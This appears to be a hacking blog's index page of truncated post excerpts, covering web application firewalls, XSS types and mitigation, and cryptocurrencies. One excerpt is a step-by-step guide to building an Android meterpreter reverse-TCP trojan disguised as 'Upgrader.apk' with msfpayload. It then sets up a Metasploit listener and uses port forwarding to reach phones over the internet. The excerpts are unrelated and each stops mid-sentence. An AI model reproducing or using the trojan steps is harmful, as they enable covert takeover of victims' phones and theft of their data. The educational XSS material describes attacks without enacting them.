Wellcome to zakir|cyberroom

A WAF or Web Application Firewall helps protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet.  It typically protects web applications from attacks such as cross-site forgery, cross-site-scripting (XSS), file inclusion, and SQL injection, among others. A WAF is a protocol layer 7 defense (in the OSI model), and is not designed to defend against all types of attacks. This method of attack mitigation is usually part of a suite of tools which together create a holistic defense against a range of attack vectors. By deploying a WAF in front of a web application, a shield is placed between the web application and the Internet. While a proxy server protects a client machine’s identity by using an intermediary, a WAF is a type of reverse-proxy, protecting the server from exposure by having clients pass through the WAF before reaching the server. A WAF operates through a set of...

While cross-site scripting attacks can be dangerous and difficult to detect, there are ways to prevent and mitigate them. The basic principles of input handling are validation, sanitization and escaping. The validation process ensures that the user input is legitimate and properly formatted according to a fixed set of validation rules. The theory here is to treat all data or inputs as untrusted until they are met with certain criteria such as type and length requirements. For example, The Phone Number input field can contain only numbers and cannot be submitted when a user is trying to type letters or special symbols to this field. Sanitizing user input is another mitigation method that essentially requires all user data to be cleaned of potentially dangerous symbols that are usually used in HTML markup and JavaScript code. When the HTML tags are allowed as a part of user input, “white lists” of tags are used and all tags that are not allowed end up removed. Keep in mind that so...

Stored (persistent) XSS Stored or persistent XSS attacks occur when the malicious scripts are permanently stored on the targeted server(s); this can occur in a database, on a message board, in comment fields, or on other user input pages. Victims receive a malicious script when the information is requested from the server. Reflected XSS A reflected attack occurs when the malicious script is not contained on the server but is included in the input sent to the server. Errors messages and search results are two commonly used vectors. These attacks are often delivered to the target via an email or on another site, often by tricking the target into choosing a link containing the malicious script or through user submitting the malicious form. The malicious code then reflects to the user's browser. This reflection causes the browser to believe that the script is trustworthy and prompts the browser to execute the script. DOM based attacks There is a third type of attack, known...

Now that we know what a cross-site scripting attack is let's see how it works. XSS attacks occur when a security vulnerability is used on a  web page,  often with a malicious link or an insecure  user input  field that allows an attacker to inject a  malicious script  into a website or application. After this script is inserted into a web page, the unsuspecting user or target often launches the execution of  malicious code  when accessing a site or application. It can occur in several different ways, and the most common of which is when the target clicks on a malicious link or every time a page is loaded from the server. In order for the attack to be successful, attackers need to find a way to transmit malicious code to the target system via the visited  web application  or website. Social engineering is a common method that allows people to visit vulnerabilities, such as a hacked web page, which then transmits a malicious code to...

Cross-site scripting attacks, often abbreviated as XSS, are a type of attack in which malicious scripts are injected into websites and web applications and run on an end user’s platform. XSS attacks are a common and widespread type of attack, using unsanitized or unvalidated user inputs, aimed at the generated output. The XSS attack does not have to choose a specific target; the attacker simply exploits the vulnerability of the application or site, taking advantage of anyone unlucky enough to trigger an attack. Using XSS attacks, a web application or web site becomes the vector of delivering malicious scripts to the browsers of several victims. XSS attacks can exploit vulnerabilities in several software environments, including VBScript, Flash, ActiveX, and JavaScript; XSS attacks most often use JavaScript due to the integrated nature of JavaScript in most browsers. This ability to exploit commonly used platforms makes XSS attacks one of the most common security vulnerabilities.

Step 1 Fire-Up Kali: Open a terminal, and make a  Trojan  .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk  (replace LHOST with your own IP) You can also hack android on  WAN i.e. through Interet  by using your  Public/External IP  in the LHOST and by  port forwarding  (ask me about port forwarding if you have problems in the comment section) Step 2 Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing :  msfconsole Step 3 Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing :  use exploit/multi/handler Set up a (reverse) payload by typing :  set payload android/meterpreter/reverse_tcp To set L host type :  set LHOST 192.168.0.4  (Even if you are hacking on WAN type your private/internal IP here not the public/e...

What Are Cryptocurrencies? Before we take a closer look at some of these alternatives to Bitcoin, let’s step back and briefly examine what we mean by terms like cryptocurrency and altcoin. A cryptocurrency, broadly defined, is virtual or digital money which takes the form of tokens or “coins.” While some cryptocurrencies have ventured into the physical world with credit cards or other projects, the large majority remain entirely intangible. The “crypto” in cryptocurrencies refers to complicated cryptography which allows for the creation and processing of digital currencies and their transactions across decentralized systems. Alongside this important “crypto” feature of these currencies is a common commitment to decentralization; cryptocurrencies are typically developed as code by teams who build in mechanisms for issuance (often, although not always, through a process called “mining”) and other controls. Cryptocurrencies are almost always d...